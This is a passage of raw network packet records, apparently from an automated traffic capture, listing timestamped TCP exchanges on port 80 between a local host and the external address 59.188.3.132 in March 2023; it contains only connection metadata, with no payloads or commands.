                                                                                                                                                              Mar 13, 2023 05:27:31.759670019 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.759670973 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.759746075 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.759788036 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.759923935 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760000944 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.760013103 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760097027 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760157108 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.760221958 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760267019 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760317087 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.760390043 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760543108 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760612965 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.760808945 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760888100 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.760948896 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.761002064 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.761140108 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.761209965 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.761238098 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.761384010 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.761440992 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.797600985 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.797661066 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.797696114 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.797740936 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.797785997 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.797844887 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.797898054 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798011065 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798055887 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798078060 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.798203945 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798275948 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798283100 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.798557997 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798633099 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.798793077 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798887968 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.798944950 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.799015045 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799099922 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799156904 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.799225092 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799309969 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799438000 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799501896 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.799563885 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799652100 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799722910 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.799752951 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799932003 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.799979925 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800000906 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.800075054 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800144911 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.800175905 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800333977 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800379038 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800399065 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.800604105 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800652027 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800666094 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.800699949 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.800777912 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.800834894 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.801274061 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.801350117 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.801394939 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.801453114 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.827625990 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.907774925 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.911868095 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.911931038 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.911964893 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912092924 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.912095070 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912166119 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.912262917 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912309885 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912364006 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.912410975 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912493944 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912566900 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.912697077 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912744045 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912822962 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.912890911 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.912976980 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913042068 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.913110971 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913156033 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913216114 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.913326979 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913433075 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913490057 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.913495064 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.936814070 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.948043108 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.962639093 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.962723970 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.962776899 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.962817907 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.962824106 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.962874889 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.962898016 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.962963104 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.962989092 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.963107109 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.963181019 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:31.963237047 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:31.966161966 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.000780106 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.000881910 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.000932932 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.000941038 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.001009941 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.001049042 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.001055956 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.001111031 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.015218973 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.015244007 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.051311970 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.075846910 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.114972115 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115034103 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115082026 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115111113 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115155935 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115155935 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115184069 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115230083 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115252018 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115292072 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115427971 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115503073 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115550041 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115629911 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115636110 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115684032 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115704060 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115735054 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115828991 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.115899086 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.115912914 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116029024 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.116059065 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116158009 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.116168022 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116254091 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116303921 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.116332054 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.116358995 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116441011 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.116480112 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.116543055 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.165606976 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.165671110 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.165733099 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.165764093 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.165823936 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.165823936 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.165832043 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.165896893 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.165947914 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.166007042 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.166093111 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.166157007 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.166179895 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.166237116 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.166264057 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.166356087 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.203759909 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.203859091 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.203913927 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.203986883 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.204035044 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.204061985 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.204109907 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.204138041 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.204163074 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.204220057 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.204281092 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.204340935 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.204400063 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.218149900 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.218230963 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.218285084 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.218310118 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.254004955 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.254134893 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.318183899 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.318245888 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.318315983 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.318381071 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.318464041 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.318464041 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.318804026 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.318924904 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.319011927 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.319019079 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.319250107 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.319328070 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.319375992 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.319482088 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.319541931 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.319577932 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.368752003 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.368819952 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.368870020 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.368923903 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369014978 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.369020939 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369020939 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369062901 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.369074106 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369112015 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369213104 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.369290113 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369334936 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.369402885 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.369457006 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.369524002 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407227993 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407344103 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407396078 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407427073 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407428026 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407444000 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407490015 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407507896 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407582045 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407684088 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407706976 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407747984 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.407769918 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.407812119 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.421467066 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.421586990 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.456794024 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.456932068 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.521271944 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.521737099 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.521836042 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.571801901 CET804970859.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.571954966 CET4970880192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.624562979 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.624629021 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.624759912 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.624759912 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.659806967 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.659877062 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.659924984 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.659948111 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.659970999 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660007000 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660007000 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660033941 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660047054 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660101891 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660166979 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660252094 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660267115 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660305977 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660372972 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660454988 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660491943 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660557032 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660577059 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660648108 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660734892 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660804987 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660819054 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.660890102 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.660970926 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.661057949 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.724896908 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.724963903 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.725060940 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.729842901 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.827652931 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.827738047 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.827786922 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.827847958 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.827909946 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.827909946 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.828016043 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.828066111 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.828099012 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.828110933 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.828138113 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.828157902 CET804970659.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.828171968 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.828217983 CET4970680192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.863188028 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863245964 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863311052 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863352060 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.863357067 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863424063 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.863523006 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863622904 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:32.863720894 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:32.863780975 CET804970959.188.3.132192.168.2.3
